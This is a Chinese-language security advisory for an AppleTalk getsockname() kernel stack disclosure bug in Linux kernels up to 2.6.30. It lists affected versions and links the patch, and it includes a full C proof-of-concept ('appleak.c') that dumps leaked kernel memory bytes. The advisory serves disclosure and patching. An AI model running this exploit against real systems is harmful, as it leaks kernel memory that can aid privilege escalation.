Linux Kernel ‘net/appletalk/ddp.c’本地信息泄漏漏洞

发表评论 (0) 查看评论

漏洞起因
设计错误
 
影响系统
Linux kernel 2.6.30 rc6
Linux kernel 2.6.30 -rc5
Linux kernel 2.6.30 -rc3
Linux kernel 2.6.30 -rc2
Linux kernel 2.6.30 -rc1
Linux kernel 2.6.30
Linux kernel 2.6.29 4
Linux kernel 2.6.29 1
Linux kernel 2.6.29 -git8
Linux kernel 2.6.29 -git14
Linux kernel 2.6.29 -git1
Linux kernel 2.6.29
Linux kernel 2.6.28 9
Linux kernel 2.6.28 8
Linux kernel 2.6.28 6
Linux kernel 2.6.28 5
Linux kernel 2.6.28 3
Linux kernel 2.6.28 2
Linux kernel 2.6.28 1
Linux kernel 2.6.28 -rc7
Linux kernel 2.6.28 -rc5
Linux kernel 2.6.28 -rc1
Linux kernel 2.6.28 -git7
Linux kernel 2.6.28
Linux kernel 2.6.27 6
Linux kernel 2.6.27 3
Linux kernel 2.6.27 24
Linux kernel 2.6.27 14
Linux kernel 2.6.27 13
Linux kernel 2.6.27 12
Linux kernel 2.6.27 12
Linux kernel 2.6.27 .8
Linux kernel 2.6.27 .5
Linux kernel 2.6.27 .5
Linux kernel 2.6.27 -rc8-git5
Linux kernel 2.6.27 -rc8
Linux kernel 2.6.27 -rc6-git6
Linux kernel 2.6.27 -rc6
Linux kernel 2.6.27 -rc5
Linux kernel 2.6.27 -rc2
Linux kernel 2.6.27 -rc1
Linux kernel 2.6.27
Linux kernel 2.6.26 7
Linux kernel 2.6.26 4
Linux kernel 2.6.26 3
Linux kernel 2.6.26 .6
Linux kernel 2.6.26 -rc6
Linux kernel 2.6.26
Linux kernel 2.6.25 19
Linux kernel 2.6.25 .9
Linux kernel 2.6.25 .8
Linux kernel 2.6.25 .7
Linux kernel 2.6.25 .6
Linux kernel 2.6.25 .5
Linux kernel 2.6.25 .15
Linux kernel 2.6.25 .13
Linux kernel 2.6.25 .12
Linux kernel 2.6.25 .11
Linux kernel 2.6.25 .10
Linux kernel 2.6.25
Linux kernel 2.6.25
Linux kernel 2.6.24 .2
Linux kernel 2.6.24 .1
Linux kernel 2.6.24 -rc5
Linux kernel 2.6.24 -rc4
Linux kernel 2.6.24 -rc3
Linux kernel 2.6.24 -git13
Linux kernel 2.6.24
Linux kernel 2.6.23 .7
Linux kernel 2.6.23 .6
Linux kernel 2.6.23 .5
Linux kernel 2.6.23 .4
Linux kernel 2.6.23 .3
Linux kernel 2.6.23 .2
Linux kernel 2.6.23 -rc2
Linux kernel 2.6.23 -rc1
Linux kernel 2.6.23
Linux kernel 2.6.22 7
Linux kernel 2.6.22 1
Linux kernel 2.6.22 .8
Linux kernel 2.6.22 .6
Linux kernel 2.6.22 .5
Linux kernel 2.6.22 .4
Linux kernel 2.6.22 .3
Linux kernel 2.6.22 .17
Linux kernel 2.6.22 .16
Linux kernel 2.6.22 .15
Linux kernel 2.6.22 .14
Linux kernel 2.6.22 .13
Linux kernel 2.6.22 .12
Linux kernel 2.6.22 .11
Linux kernel 2.6.22
Linux kernel 2.6.22
Linux kernel 2.6.21 4
Linux kernel 2.6.21 .7
Linux kernel 2.6.21 .6
Linux kernel 2.6.21 .2
Linux kernel 2.6.21 .1
Linux kernel 2.6.21
Linux kernel 2.6.21
Linux kernel 2.6.21
Linux kernel 2.6.20 .9
Linux kernel 2.6.20 .8
Linux kernel 2.6.20 .5
Linux kernel 2.6.20 .4
Linux kernel 2.6.20 .15
Linux kernel 2.6.20 -git5
Linux kernel 2.6.20
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.20
Linux kernel 2.6.19 1
Linux kernel 2.6.19 .2
Linux kernel 2.6.19 .1
Linux kernel 2.6.19 -rc4
Linux kernel 2.6.19 -rc3
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.19 -rc2
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.19 -rc1
Linux kernel 2.6.19
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.18 .4
Linux kernel 2.6.18 .3
Linux kernel 2.6.18 .1
Linux kernel 2.6.18
Linux kernel 2.6.17 .8
Linux kernel 2.6.17 .7
Linux kernel 2.6.17 .6
Linux kernel 2.6.17 .5
Linux kernel 2.6.17 .3
Linux kernel 2.6.17 .2
Linux kernel 2.6.17 .14
Linux kernel 2.6.17 .13
Linux kernel 2.6.17 .12
Linux kernel 2.6.17 .11
Linux kernel 2.6.17 .10
Linux kernel 2.6.17 .1
Linux kernel 2.6.17 -rc5
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.16 27
Linux kernel 2.6.16 13
Linux kernel 2.6.16 .9
Linux kernel 2.6.16 .7
Linux kernel 2.6.16 .23
Linux kernel 2.6.16 .19
Linux kernel 2.6.16 .12
Linux kernel 2.6.16 .11
Linux kernel 2.6.16 .1
Linux kernel 2.6.16 -rc1
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.15 .4
Linux kernel 2.6.15 .3
Linux kernel 2.6.15 .2
Linux kernel 2.6.15 .1
Linux kernel 2.6.15 -rc3
Linux kernel 2.6.15 -rc2
Linux kernel 2.6.15 -rc1
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.14 .5
Linux kernel 2.6.14 .4
Linux kernel 2.6.14 .3
Linux kernel 2.6.14 .2
Linux kernel 2.6.14 .1
Linux kernel 2.6.14 -rc4
Linux kernel 2.6.14 -rc3
Linux kernel 2.6.14 -rc2
Linux kernel 2.6.14 -rc1
Linux kernel 2.6.14
Linux kernel 2.6.14
Linux kernel 2.6.13 .4
Linux kernel 2.6.13 .3
Linux kernel 2.6.13 .2
Linux kernel 2.6.13 .1
Linux kernel 2.6.13 -rc7
Linux kernel 2.6.13 -rc6
Linux kernel 2.6.13 -rc4
Linux kernel 2.6.13 -rc1
Linux kernel 2.6.13
Linux kernel 2.6.13
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.12 .6
Linux kernel 2.6.12 .5
Linux kernel 2.6.12 .4
Linux kernel 2.6.12 .3
Linux kernel 2.6.12 .22
Linux kernel 2.6.12 .2
Linux kernel 2.6.12 .12
Linux kernel 2.6.12 .1
Linux kernel 2.6.12 -rc5
Linux kernel 2.6.12 -rc4
Linux kernel 2.6.12 -rc1
Linux kernel 2.6.12
Linux kernel 2.6.12
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 .4
Linux kernel 2.6.11 .12
Linux kernel 2.6.11 .11
Linux kernel 2.6.11 -rc4
Linux kernel 2.6.11 -rc3
Linux kernel 2.6.11 -rc2
Linux kernel 2.6.11
Linux kernel 2.6.11
Linux kernel 2.6.10 rc2
Linux kernel 2.6.10
Linux kernel 2.6.10
Linux kernel 2.6.9
Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.8
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Linux kernel 2.6.8.1
+ S.u.S.E. Linux Personal 9.2 x86_64
+ S.u.S.E. Linux Personal 9.2
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.29-rc2-git1
Linux kernel 2.6.29-rc2
Linux kernel 2.6.29-rc1
Linux kernel 2.6.28.4
Linux kernel 2.6.26.1
Linux kernel 2.6.26-rc5-git1
Linux kernel 2.6.25.4
Linux kernel 2.6.25.3
Linux kernel 2.6.25.2
Linux kernel 2.6.25.1
Linux kernel 2.6.24.6
Linux kernel 2.6.24-rc2
Linux kernel 2.6.24-rc1
Linux kernel 2.6.23.14
Linux kernel 2.6.23.10
Linux kernel 2.6.23.1
Linux kernel 2.6.23.09
Linux kernel 2.6.22-rc7
Linux kernel 2.6.22-rc1
Linux kernel 2.6.21-RC6
Linux kernel 2.6.21-RC5
Linux kernel 2.6.21-RC4
Linux kernel 2.6.21-RC3
Linux kernel 2.6.21-RC3
Linux kernel 2.6.20.3
Linux kernel 2.6.20.2
Linux kernel 2.6.20.13
Linux kernel 2.6.20.11
Linux kernel 2.6.20.1
Linux kernel 2.6.20-rc2
Linux kernel 2.6.20-2
Linux kernel 2.6.18-8.1.8.el5
Linux kernel 2.6.18-53
Linux kernel 2.6.18
Linux kernel 2.6.15.5
Linux kernel 2.6.15.11
Linux kernel 2.6.15-27.48
Linux kernel 2.6.11.4
 
不受影响系统
 
危害
本地攻击者可以利用漏洞获得内核敏感信息。
 
攻击所需条件
攻击者必须访问Linux。
 
漏洞信息
Linux是一款开放源代码的操作系统。
Linux ‘net/appletalk/ddp.c’文件包含的atalk_getname()函数可泄漏8字节内核内存给用户,导致敏感信息泄漏。
 
测试方法
/**
 * appleak.c
 *
 * Linux keunouille <= 2.6.30
 *
 * AppleTalk getsockname() 8-bytes kernel stack disclosure
 *
 * http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=3d392475c873c10c10d6d96b94d092a34ebd4791
 *
 * atalk_getname() can leak 8 bytes of kernel memory to user
 *
 * [clem1@noe ~]$ ./appleak
 * 1e 83 f2 31 ec 56 d7 f6 | …1.V..
 * 00 f4 55 f6 84 2a ca bf | ..U..*..
 * 00 f4 55 f6 1e 83 f2 31 | ..U….1
 * 1e 83 f2 31 00 60 5e f6 | …1.`^.
 * 00 f4 55 f6 84 2a ca bf | ..U..*..
 * c0 2a 54 c0 a8 61 45 f6 | .*T..aE.
 * 21 54 12 c0 84 2a ca bf | !T…*..
 * (…)
 *
 * (c) Clément LECIGNE <root[a]clem1.be>
 */
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <net/if_arp.h>
#include <linux/atalk.h>
void kernop(int fd)
{
    /* from Jon Oberheide sploit
     */
    const int   randcalls[] = {
        __NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
        __NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
        __NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
        __NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
        __NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
        __NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
        __NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
        __NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
        __NR_sched_getparam, __NR_sched_get_priority_max
    };
    const int   randsopts[] = { SOL_SOCKET, AF_APPLETALK };
    int         ret, len;
    char        buf[1024];
    do
    {
        switch ( rand() % 3 )
        {
            case 0:
                ret = syscall(randcalls[rand() % sizeof(randcalls)/sizeof(randcalls[0])]);
                break;
            case 1:
                len = (rand() % 2) ? sizeof(int) : sizeof(buf);
                ret = getsockopt(fd, randsopts[rand() % sizeof(randsopts)/sizeof(randsopts[0])], rand() % 130, &buf, &len);
                break;
            case 2:
                len = (rand() % 2) ? sizeof(int) : sizeof(buf);
                ret = setsockopt(fd, randsopts[rand() % sizeof(randsopts)/sizeof(randsopts[0])], rand() % 130, &buf, len);
                break;
        }
    }
    while ( ret < 0 );
}
void dump( unsigned char * data, unsigned int len )
{
    unsigned int dp, p;
    const char trans[] =
    "………………………….. !\"#$%&'()*+,-./0123456789"
    ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
    "nopqrstuvwxyz{|}~………………………………"
    "…………………………………………….."
    "………………………………….";
    for ( dp = 1; dp <= len; dp++ )
    {
        printf("%02x ", data[dp-1]);
        if ( (dp % 8) == 0 )
        {
            printf("| ");
            p = dp;
            for ( dp -= 8; dp < p; dp++ ) {
                printf("%c", trans[data[dp]]);
            }
            printf("\n");
        }
    }
    return;
}
int main(void)
{
    struct sockaddr_at  sat;
    int                 s, len = sizeof(sat), occ = 500;
    char                prev_zero[sizeof(sat.sat_zero)] = { 0 };
    s = socket(AF_APPLETALK, SOCK_DGRAM, 0);
    if ( s == -1 )
    {
        perror("socket");
        return EXIT_FAILURE;
    }
    memset(&sat, 0, sizeof(sat));
    sat.sat_family = AF_APPLETALK;
    sat.sat_addr.s_net = htons(ATADDR_ANYNET);
    sat.sat_addr.s_node = ATADDR_ANYNODE;
    sat.sat_port = ATADDR_ANYPORT;
    if ( bind(s, (struct sockaddr *) &sat, len) < 0 )
    {
        perror("bind");
        return EXIT_FAILURE;
    }
    srand(time(NULL) ^ getpid());
    while ( –occ )
    {
        kernop(s);
        if ( getsockname(s, (struct sockaddr *) &sat, &len) == 0 )
        {
            if ( memcmp(sat.sat_zero, prev_zero, sizeof(sat.sat_zero)) != 0 )
            {
                dump((unsigned char *) &sat.sat_zero, sizeof(sat.sat_zero));
                memcpy(&prev_zero, &sat.sat_zero, sizeof(sat.sat_zero));
                usleep(5000);
            }
        }
    }
    close(s);
    return EXIT_SUCCESS;
}
 
厂商解决方案
用户可参考如下安全公告获得补丁信息:
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=3d392475c873c10c10d6d96b94d092a34ebd4791
 
漏洞提供者
Cl??ment LECIGNE

发表评论?

0 条评论。

发表评论